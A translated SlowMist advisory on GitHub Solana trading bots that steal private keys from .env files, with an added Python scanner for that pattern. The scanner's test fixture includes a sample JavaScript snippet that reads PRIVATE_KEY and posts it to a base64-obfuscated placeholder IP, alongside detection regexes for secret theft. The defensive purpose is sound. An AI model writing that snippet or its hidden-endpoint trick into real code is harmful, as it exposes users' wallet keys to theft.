Source: SlowMist (慢雾科技)
Original link: https://mp.weixin.qq.com/s/Tu5queqqz874swt6znwbtA
Background
In early July 2025, the SlowMist security team received a request for help from a victim whose crypto assets had been stolen. The investigation traced the theft to the user having run an open-source project hosted on GitHub, zldp2002/solana-pumpfun-bot, which contained a covert asset-theft routine; details are in the earlier article "GitHub Popular Solana Tool Hides Asset Theft Trap".
Recently, another user contacted the SlowMist security team after losing crypto assets through a similar open-source project, audiofilter/pumpfun-pumpswap-sniper-copy-trading-bot. The team analyzed the attack method further.
In the attack method shared this time, the attacker poses as a legitimate open-source project to induce users to download and execute malicious code. The project reads sensitive information from the local .env file and transmits the stolen private keys to a server controlled by the attacker. Such attacks are usually combined with social engineering, and users who are not careful can easily fall victim.
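The pattern above (read secrets from .env or the environment, then send them out over the network) can be triaged statically before a cloned repository is ever run. The following is an added example written for this page, not SlowMist's tooling nor code from either malicious project: a heuristic scanner that flags JavaScript/TypeScript files which both read secret-looking values and make outbound requests, rates them by whether the destination is a known host, hidden or obfuscated, and also lists npm install-time hooks (preinstall/postinstall), which run before any bot code is started. The regex lists, the host allowlist and the three sample sources are constructed for illustration; 192.0.2.10 is a TEST-NET address. A "low" rating is not proof of safety, only that none of these heuristics fired.

```python
"""Heuristic pre-run triage of an untrusted Node.js project for the
.env-read + exfiltration pattern. Added example; patterns and samples are
constructed assumptions, not taken from any real repository."""
import json
import re
from dataclasses import dataclass, field
from pathlib import Path

# (regex, label) pairs; all are heuristics chosen for this example.
SECRET_READ = [
    (r"\bdotenv\b", "dotenv import/config"),
    (r"process\.env\.[A-Z_]*(KEY|SECRET|MNEMONIC|SEED|PASS)", "secret-looking env var"),
    (r"readFileSync\([^)]*\.env", "raw .env file read"),
    (r"\bKeypair\.fromSecretKey\(|\bbs58\.decode\(", "Solana secret key decode"),
]
NETWORK_SEND = [
    (r"\bfetch\(", "fetch()"),
    (r"\baxios\.(post|put|get|request)\(", "axios request"),
    (r"\bhttps?\.request\(", "http(s).request()"),
    (r"new WebSocket\(", "WebSocket"),
    (r"\bdns\.(resolve|lookup)\(", "dns query (possible DNS exfil)"),
]
OBFUSCATION = [
    (r"Buffer\.from\([^)]*['\"]base64['\"]\)", "base64-decoded literal"),
    (r"String\.fromCharCode\(", "char-code string building"),
    (r"\beval\(|new Function\(", "dynamic code execution"),
    (r"https?://\d{1,3}(\.\d{1,3}){3}", "hard-coded IP endpoint"),
]
URL_HOST = re.compile(r"https?://([A-Za-z0-9.\-]+)")
INSTALL_HOOKS = {"preinstall", "install", "postinstall", "prepare"}


@dataclass
class Finding:
    path: str
    secret_reads: list = field(default_factory=list)
    network_sends: list = field(default_factory=list)
    obfuscation: list = field(default_factory=list)
    endpoints: list = field(default_factory=list)
    risk: str = "low"


def _labels(patterns, text):
    return [label for pat, label in patterns if re.search(pat, text)]


def scan_source(path, text, allowlist=frozenset()):
    """Rate one file. 'high': secret read + send to an unknown, hidden or
    obfuscated destination; 'review': secret read + send only to allowlisted
    hosts; 'medium': one of the two plus obfuscation; 'low': otherwise."""
    f = Finding(path)
    f.secret_reads = _labels(SECRET_READ, text)
    f.network_sends = _labels(NETWORK_SEND, text)
    f.obfuscation = _labels(OBFUSCATION, text)
    f.endpoints = sorted({m.group(1) for m in URL_HOST.finditer(text)})
    unknown = [h for h in f.endpoints if h not in allowlist]
    if f.secret_reads and f.network_sends:
        # No literal endpoint at all means the destination is built at runtime.
        f.risk = "high" if (f.obfuscation or unknown or not f.endpoints) else "review"
    elif f.obfuscation and (f.secret_reads or f.network_sends):
        f.risk = "medium"
    return f


def install_hooks(package_json_text):
    """Scripts npm runs during 'npm install', before any bot code is started."""
    scripts = json.loads(package_json_text).get("scripts", {})
    return {k: v for k, v in scripts.items() if k in INSTALL_HOOKS}


def scan_tree(root, allowlist=frozenset()):
    """Scan every JS/TS file under root, skipping node_modules; worst risk first."""
    findings = []
    for p in Path(root).rglob("*"):
        if "node_modules" in p.parts or p.suffix not in {".js", ".ts", ".mjs", ".cjs"}:
            continue
        findings.append(scan_source(str(p), p.read_text(errors="replace"), allowlist))
    order = {"high": 0, "medium": 1, "review": 2, "low": 3}
    return sorted(findings, key=lambda f: order[f.risk])


# Constructed samples. The base64 literal decodes to http://192.0.2.10:8080.
MALICIOUS_JS = """
require('dotenv').config();
const axios = require('axios');
const key = process.env.PRIVATE_KEY;
const host = Buffer.from('aHR0cDovLzE5Mi4wLjIuMTA6ODA4MA==', 'base64').toString();
axios.post(host + '/collect', { k: key });
"""
LEGIT_TRADER_JS = """
const secret = bs58.decode(process.env.PRIVATE_KEY);
const rpc = 'https://api.mainnet-beta.solana.com';
fetch(rpc, { method: 'POST', body: JSON.stringify({ method: 'getBalance' }) });
"""
CONFIG_JS = """
require('dotenv').config();
module.exports = { rpc: process.env.RPC_URL || 'https://api.mainnet-beta.solana.com' };
"""
KNOWN_HOSTS = frozenset({"api.mainnet-beta.solana.com"})

if __name__ == "__main__":
    for name, src in [("steal.js", MALICIOUS_JS), ("trade.js", LEGIT_TRADER_JS), ("config.js", CONFIG_JS)]:
        f = scan_source(name, src, KNOWN_HOSTS)
        print(f"{f.risk:6} {f.path}: reads={f.secret_reads} sends={f.network_sends} "
              f"obf={f.obfuscation} hosts={f.endpoints}")
```

A real trading bot legitimately reads a private key and talks to an RPC endpoint, so the scanner cannot decide on its own; it separates files whose only destinations are hosts you recognise ("review") from files that hide or obfuscate where the data goes ("high"), and the latter are the ones to read line by line before anything is executed. Run `scan_tree(".", KNOWN_HOSTS)` on the cloned repository and `install_hooks(open("package.json").read())` before `npm install`, since an install hook runs with no bot code visible in the entry point.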
We recommend that developers and users remain highly vigilant about GitHub projects of unknown origin, especially those involving wallet or private-key operations. If a project must be run or debugged, do so in an isolated environment that holds no sensitive data, so that malicious programs and commands from unknown sources cannot reach real keys.
For more security knowledge, refer to the Blockchain Dark Forest Selfguard Handbook produced by SlowMist:
https://github.com/slowmist/Blockchain-dark-forest-selfguard-handbook/blob/main/README_CN.md